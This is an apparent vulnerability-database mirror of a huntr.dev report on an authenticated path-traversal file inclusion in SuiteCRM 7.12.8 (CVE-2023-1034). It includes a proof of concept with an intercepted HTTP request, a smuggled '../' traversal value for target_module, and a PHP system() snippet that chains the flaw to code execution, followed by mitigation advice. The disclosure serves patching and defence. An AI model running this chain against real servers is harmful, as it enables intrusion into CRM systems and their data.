Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrCr4ckc4t0C1365BC-8D9A-4AE0-8B55-615D492B3730
HistoryNov 29, 2022 - 2:06 p.m.

Limited LFI via Path Traversal

2022-11-2914:06:33
cr4ckc4t
www.huntr.dev
14
suitecrm
lfi
path traversal
php file
user authentication
remote attackers
remote code execution
proof of concept
vulnerability

EPSS

0.001

Percentile

38.0%

JSON

Description

A path thraversal vulnerability in SuiteCRM 7.12.8 and earlier allows remote authenticated attackers to include a php file at an arbitrary path via unsanitized request parameters.

Details

In Suite CRM v7.12.8, SubpanelCreates.php and SubpanelEdit.php trust unsanitized user input to load a .php file via require. At least low level user authentication is required to trigger the vulnerability.

// SubpanelCreates.php L44
// User controls target_module
$mod_strings = return_module_language($current_language, $_REQUEST['target_module']);
[...]
// utils.php L1422
// $module is still the user input
$loaded_mod_strings = LanguageManager::loadModuleLanguage($module, $language, $refresh);
[...]
// LanguageManager.php L268
// $module is still the user input
$cachedfile = sugar_cached('modules/').$module.'/language/'.$lang.'.lang.php';
[...]
if (file_exists($cachedfile)) {
            global $mod_strings;

            require $cachedfile;
[...]

Proof of Concept

1 - Login to SuiteCRM (normal user with default permissions is enough - PoC requires the user to create a “Call”)

2 - Navigate to “Calls” - “Create Call” - fill in a subject - “Save”

3 - Now select “Create Note or Attachment” from the “Notes” tab

4 - Intercept the outgoing request - it looks like this:

POST /index.php HTTP/1.1
Host: 10.0.5.4
Content-Length: 418
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.0.5.4
Referer: http://10.0.5.4/index.php?action=DetailView&module=Calls&record=61494278-5f7e-8c0c-8ebe-63860394c556&return_module=Calls&return_action=DetailView&offset=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; _ga=GA1.1.942238813.1668699570; browserupdateorg=pause; xoops_user_6374ee42=1-004d76ce862be7d3476fa5bed68d529fcc57448ce07ed55dcc3b827801f37c407993b00bbb152419355fd8f86445e6d7da86a1782ef4fdfae3b13ad68c48dca8-ba58b54cd01bef7565aef75880049a8a6c96275c7a5aeb7300f0c8833ea4d4c4ed6ff2afdd46555b0819c3de5c74525754f982ec9b8eef59a2cbed14055afe7d; sid=1; shash=%242y%2410%241X9GGrpnbjXuiqGOwJrkZueXrHY6cCGUKtZ88Abw1euO62sfw6yRe; miniSidebar=1; sugar_user_theme=SuiteP; ck_login_language_20=en_us; Tasks_divs=Tasks_history_v%3Dtrue%23undefined%3D%23Tasks_securitygroups_v%3Dtrue%23; Contacts_divs=Contacts_bugs_v%3Dtrue%23undefined%3D%23; EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; Accounts_divs=Accounts_activities_v%3Dtrue%23undefined%3D%23Accounts_history_v%3Dfalse%23Accounts_documents_v%3Dtrue%23Accounts_contacts_v%3Dtrue%23Accounts_securitygroups_v%3Dtrue%23; ck_login_theme_20=SuiteP; ck_login_id_20=58b402d3-aef6-2b59-a5c9-6385e39c3b6a; Users_divs=Users_aclroles_v%3Dtrue%23undefined%3D%23Users_securitygroups_v%3Dtrue%23; SecurityGroups_divs=SecurityGroups_users_v%3Dtrue%23undefined%3D%23SecurityGroups_aclroles_v%3Dtrue%23; Calls_divs=Calls_contacts_v%3Dtrue%23undefined%3D%23Calls_users_v%3Dtrue%23Calls_leads_v%3Dtrue%23Calls_history_v%3Dtrue%23; sidebartoggle=expanded; PHPSESSID=q0si3s73dopom9kqvnttdjbcmn
Connection: close

target_module=Notes&call_id=61494278-5f7e-8c0c-8ebe-63860394c556&call_name=a&to_pdf=true&tpl=QuickCreate.tpl&return_module=Calls&return_action=DetailView&return_id=61494278-5f7e-8c0c-8ebe-63860394c556&record=&action=SubpanelCreates&module=Home&target_action=QuickCreate&parent_type=Calls&parent_name=a&parent_id=61494278-5f7e-8c0c-8ebe-63860394c556&History_createnoteorattachment_button=Create%20Note%20or%20Attachment

We can now modify the target_module parameter to point to an arbitrary location.

Combined with any sort of file upload (e.g. FTP), this may turn into RCE. In a location that’s accessible by the webserver:

# for example in /home/dummy/Documents (could also be an NFS or FTP share)
mkdir language
echo "<?php system('touch /var/www/html/i-was-here.txt'); ?>" > language/en_us.lang.php

Replace target_module with ../../../../../home/dummy/Documents and forward the request. The file i-was-here.txt is now in the web-root.

Mitigation

Sanitize the user input for example by removing . and /.

Notes

Testing was done with SubpanelCreates.php. SubpanelEdits.php contains the same vulnerable lines, however, I was not able to identify a valid entry point for that file during testing. I expect it to be exploitable in the same fashion.

Related

cvelist 1
prion 1
osv 2
nvd 1
cve 1
cvelist
cvelist
CVE-2023-1034 Path Traversal: '\..\filename' in salesagility/suitecrm
2023-02-25 00:00:00
prion
prion
Path traversal
2023-02-25 02:15:00
osv
osv
CVE-2023-1034
2023-02-25 02:15:12
BIT-suitecrm-2023-1034
2024-03-06 11:07:48
nvd
nvd
CVE-2023-1034
2023-02-25 02:15:12
cve
cve
CVE-2023-1034
2023-02-25 02:15:12

EPSS

0.001

Percentile

38.0%

JSON
Related for 0C1365BC-8D9A-4AE0-8B55-615D492B3730
cvelist1prion1osv2nvd1cve1